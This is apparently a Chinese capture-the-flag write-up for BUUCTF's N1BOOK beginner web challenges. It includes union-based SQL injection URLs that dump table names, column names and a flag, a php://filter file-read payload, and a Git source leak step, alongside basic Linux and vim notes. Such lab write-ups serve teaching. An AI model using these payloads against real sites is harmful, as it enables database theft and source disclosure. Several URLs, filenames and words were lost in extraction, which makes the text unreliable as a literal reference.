2023年6月29日发(作者：)

BUUCTFN1BOOK配套题⽬⽬录今天上线BUUOJ的时候发现多了⼀栏N1BOOK。持续更新中~[第⼀章 web⼊门]常见的搜集扫⼀下发现存在,~,.三个⽂件，分别存放了flag的3个部分:告诉爬⾍哪些页⾯可以爬取~:php的备份有两种：*.php~和*.:当vim出现异常会产⽣.swp⽂件，可以通过vim -r .恢复⽂件linux操作这边也顺便记录下linux下的⼀些操作在linux下，.开头的⽂件是隐藏⽂件，需要ls -a可以查看rm -f删除⽂件（force的意思）不提⽰任何信息直接删除wget命令从url下载⽂件wget /.l命令curl -O /.-o-o参数将服务器的回应保存成⽂件，等同于wget命令。curl -o 上⾯命令将保存成。-O-O参数将服务器回应保存成⽂件，并将 URL 的最后部分当作⽂件名。curl -O /foo/上⾯命令将服务器回应保存成⽂件，⽂件名为。vim常⽤指令常⽤退出命令先ESC跳到命令模式然后:w（保存⽂件不退出）:w!（强制保存不退出）:wq（保存并退出）:wq!（强制保存并退出）:q（不保存退出）:q!（不保存强制退出）:e!（放弃修改，从上次保存⽂件开始再编辑） 常⽤插⼊命令i 在当前位置⽣前插⼊I 在当前⾏⾸插⼊a 在当前位置后插⼊A 在当前⾏尾插⼊o 在当前⾏之后插⼊⼀⾏O 在当前⾏之前插⼊⼀⾏ 常⽤查找命令/flag 回车后查找flag，按n键查找下⼀个[第⼀章 web⼊门]粗⼼的⼩李没什么好说的，Git源码泄露python2.7 git_ /.git/源码⾥找到flag[第⼀章 web⼊门]SQL注⼊-1存在字符型注⼊⽤union select测试哪⼀列有回显/?id=-1%27%20union%20select%201,2,3--+开始注⼊查表名/?id=-1%27%20union%20select%201,group_concat(table_name),1%20from%20information_%20where%20table_schema=database()--+查列名/?id=-1%27%20union%20select%201,group_concat(column_name),1%20from%20information_s%20where%20table_name=%27fl4g%27--+查flag/?id=-1%27%20union%20select%201,fllllag,1%20from%20fl4g--+[第⼀章 web⼊门]afr_1伪协议读取/?p=php://filter/read=64-encode/resource=flagbase64解码得到flag